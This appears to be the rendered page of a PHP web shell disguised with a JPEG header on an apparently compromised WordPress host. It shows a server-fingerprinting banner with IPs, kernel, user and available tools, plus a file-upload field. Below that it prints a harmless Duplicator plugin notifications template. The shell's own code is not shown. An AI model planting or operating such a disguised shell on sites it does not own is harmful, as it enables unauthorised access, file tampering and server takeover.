????JFIF??x?x????'
Server IP : 104.21.80.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tempvsty/peekmysite.com/wp-content/plugins/duplicator/template/parts/Notifications/ |
Upload File : |
<?php /** * Admin Notifications template. * * Variables * * @var \Duplicator\Core\Views\TplMng $tplMng * @var array<string, mixed> $tplData */ defined('ABSPATH') || exit; ?> <div id="dup-notifications"> <div class="dup-notifications-header"> <div class="dup-notifications-bell"> <img src="<?php echo DUPLICATOR_PLUGIN_URL; ?>assets/img/notification-bell.svg"/> <span class="wp-ui-notification dup-notifications-circle"></span> </div> <div class="dup-notifications-title"><?php esc_html_e('Notifications', 'duplicator'); ?></div> </div> <div class="dup-notifications-body"> <a class="dismiss" title="<?php esc_attr_e('Dismiss this message', 'duplicator'); ?>"><i class="fa fa-times-circle" aria-hidden="true"></i></a> <?php if (count($tplData['notifications']) > 1) : ?> <div class="navigation"> <a class="prev"> <span class="screen-reader-text"><?php esc_attr_e('Previous message', 'duplicator'); ?></span> <span aria-hidden="true">‹</span> </a> <a class="next"> <span class="screen-reader-text"><?php esc_attr_e('Next message', 'duplicator'); ?></span> <span aria-hidden="true">›</span> </a> </div> <?php endif; ?> <div class="dup-notifications-messages"> <?php foreach ($tplData['notifications'] as $notification) { $tplMng->render('parts/Notifications/single-message', $notification); } ?> </div> </div> </div>